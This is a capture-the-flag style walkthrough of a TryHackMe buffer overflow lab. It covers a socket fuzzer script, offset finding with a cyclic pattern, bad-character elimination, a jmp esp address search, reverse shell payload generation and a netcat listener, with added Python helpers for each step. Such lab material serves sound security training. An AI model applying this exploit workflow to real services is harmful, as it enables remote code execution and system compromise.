BOF - Tib3rius
Tib3rius: https://tryhackme.com/room/bufferoverflowprep
1- Mona Configuration
First, set up the mona module's working folder:
!mona config -set workingfolder c:\mona\%p
2- Fuzzing
Create a file on your Kali box called fuzzer.py with the following contents:
#!/usr/bin/env python3
import socket, time, sys

ip = "10.10.202.33"
port = 1337
timeout = 5

prefix = "OVERFLOW1 "
string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)  # read the banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)  # if the service died, this times out or errors
    except:
        # any failure is taken as "the application crashed at this length"
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"  # grow the payload by 100 bytes per round
    time.sleep(1)
We can see that the application crashed at 2000 bytes. Immunity Debugger reports "Access Violation when executing 41414141" (EIP was overwritten with the A's).

Make sure to restart the application before every step.
3- Crash Replication & Controlling EIP
Create another file on your Kali box called exploit.py with the following contents:
• Generate a cyclic pattern 400 bytes longer than the string that crashed the application.
• Copy the output and place it into the payload variable of the exploit.py script.
Once we execute the script, the application crashes again.
Once the application has crashed, run the mona command with the same length as the pattern we created.
The output should look like this:

• Update the exploit.py script and set the offset variable (previously 0) to the value found (offset 1978).
• Set the payload variable to an empty string.
• Set the retn variable to "BBBB".
Run the exploit.py script again and the EIP register should be overwritten with the 4 B's (42424242).
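As an added example (not part of the original page or Tib3rius's scripts), the following reproduces what the pattern-create / pattern-offset step does: it builds a Metasploit-style non-repeating pattern and looks up where a given EIP value sits inside it, which is how the offset of 1978 above is obtained. The EIP dword used in the check is computed from the pattern itself, not taken from the page.

```python
#!/usr/bin/env python3
# Added example: Metasploit-style cyclic pattern generator and offset finder.
import string
import struct


def pattern_create(length):
    """Build the non-repeating pattern 'Aa0Aa1Aa2...' of exactly `length` chars.

    Each 3-char chunk is upper + lower + digit, so any 3-char (or longer)
    substring occurs at a single position in the pattern.
    """
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # caller asked for more than the 20280-char period; return what exists
    return "".join(chunks)[:length]


def pattern_offset(value, length):
    """Return the offset of `value` inside a pattern of `length` chars.

    `value` may be the EIP dword the debugger shows (an int) or a 4-char
    string. EIP holds the bytes little-endian, so an int is repacked with
    "<I" before searching. Returns None if the value is not in the pattern.
    """
    pattern = pattern_create(length)
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    else:
        needle = value
    idx = pattern.find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    # 2000-byte crash + 400 bytes = 2400-char pattern, as in step 3.
    # 0x6F43396E is the dword found at offset 1978 of that pattern (constructed).
    print(pattern_offset(0x6F43396E, 2400))
```

The same lookup works with the EIP value copied straight out of the debugger's register pane; passing the value as an int spares you from reversing the byte order by hand.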

4- Finding Bad Characters
Generate a bytearray using mona, excluding the null byte \x00. The bytearray.bin file will be written to C:\mona\oscp\bytearray.bin.

Now we need to generate the string of bad chars with a python3 script.
• Update the exploit.py script by setting the payload variable to the string of bad chars.
Once the application has crashed, compare the bytearray with the memory the ESP register points to, using the mona command:


Note that not all of the bytes listed are necessarily bad chars: a single bad char can corrupt every byte that follows it, so we remove them one at a time. \x00 is a bad char by default.
Run the mona command again to generate a new bytearray.bin without the bad char, and remove the same bad char from the payload in our exploit.py script.
Then perform the comparison again with the same steps, using the new ESP value.

We keep removing bad chars one by one and comparing until we reach the Unmodified status.
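The following is an added example, not part of the original page and not mona's own code: it does in plain Python what the mona comparison above reports, and makes the "remove one at a time" caveat concrete. The target application is replaced by a constructed stand-in that drops \x07 and rewrites \x2e, so the first round shows many differing bytes even though only two bytes are actually bad.

```python
#!/usr/bin/env python3
# Added example: bytearray comparison in the style of mona's compare output.


def all_chars(exclude=(0x00,)):
    """The candidate bytes to send, like mona's bytearray with \x00 excluded."""
    return bytes(b for b in range(256) if b not in exclude)


def compare(sent, seen):
    """Compare the bytes sent with the bytes read back from memory at ESP.

    Returns the string 'Unmodified' when they match, otherwise a list of
    (offset, sent_byte, seen_byte) tuples. A dump that is shorter than what
    was sent counts as a difference (seen_byte is None there).
    """
    diffs = []
    for i, b in enumerate(sent):
        got = seen[i] if i < len(seen) else None
        if got != b:
            diffs.append((i, b, got))
    return "Unmodified" if not diffs else diffs


def first_suspect(sent, seen):
    """Only the first differing byte is trustworthy.

    A bad char is typically dropped or converted, which shifts or mangles
    every byte after it, so later differences are usually side effects.
    Returns the first suspect byte value, or None when unmodified.
    """
    result = compare(sent, seen)
    return None if result == "Unmodified" else result[0][1]


def fake_app_copy(data):
    """Constructed stand-in for the target: drops \x07 and rewrites \x2e to \x2f."""
    return data.replace(b"\x07", b"").replace(b"\x2e", b"\x2f")


if __name__ == "__main__":
    excluded = [0x00]
    # Round-trip until the buffer comes back unmodified, removing one bad
    # char per round exactly as the text describes.
    while True:
        sent = all_chars(excluded)
        suspect = first_suspect(sent, fake_app_copy(sent))
        if suspect is None:
            print("Unmodified; bad chars:", ["\\x%02x" % b for b in excluded])
            break
        print("first differing byte: \\x%02x" % suspect)
        excluded.append(suspect)
```

In the first round `compare` reports 249 differing positions because dropping \x07 shifts everything behind it, yet only \x07 is added to the exclusion list; the second round then isolates \x2e, and the third comes back Unmodified. With a real target the `fake_app_copy` call is replaced by the bytes you dump from the address ESP points to.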

5- Finding a Jump Point
Find all "jmp esp" instructions whose addresses don't contain any of the specified bad chars. (Log Data)

• Choose an address with status "False". Set the retn variable to that address written backwards (little endian), for example 0x625011af = \xaf\x11\x50\x62.
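As an added example (not code from the original page), this is the little-endian conversion shown above done with struct, together with the check the text asks for: an address is rejected if any of its four bytes is a bad char. The candidate address list in the check is constructed for illustration; only 0x625011af comes from the page.

```python
#!/usr/bin/env python3
# Added example: pack a 32-bit return address little-endian and verify it
# contains no bad chars before it goes into the retn variable.
import struct


def retn_bytes(address, badchars):
    """Return `address` as the 4 bytes that must appear in the buffer.

    Raises ValueError if any byte of the packed address is in `badchars`,
    because such an address would be mangled by the target just like the
    bad chars found in step 4.
    """
    packed = struct.pack("<I", address)
    hits = [b for b in packed if b in badchars]
    if hits:
        raise ValueError("address %#010x contains bad char(s) %s"
                         % (address, ", ".join("\\x%02x" % b for b in hits)))
    return packed


def usable_addresses(candidates, badchars):
    """Filter a list of candidate jump addresses down to the usable ones."""
    usable = []
    for addr in candidates:
        try:
            retn_bytes(addr, badchars)
            usable.append(addr)
        except ValueError:
            pass
    return usable


if __name__ == "__main__":
    badchars = {0x00, 0x07, 0x2e, 0xa0}
    # 0x625011af is the page's example; the other two are constructed.
    candidates = [0x62500000, 0x625011af, 0x62502e10]
    print(["%#010x" % a for a in usable_addresses(candidates, badchars)])
    print(retn_bytes(0x625011af, badchars))
```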
6- Generate Payload
Generate the reverse shell payload, specifying the bad chars with the -b option.
• Copy the C-format output and set it as the value of the payload variable.
7- Prepend NOPs
We need to leave some room in memory before the payload. Set the padding variable to 16 or more "No Operation" (\x90) bytes:
8- Exploit
Start a netcat listener on port 4444 and execute the python script.
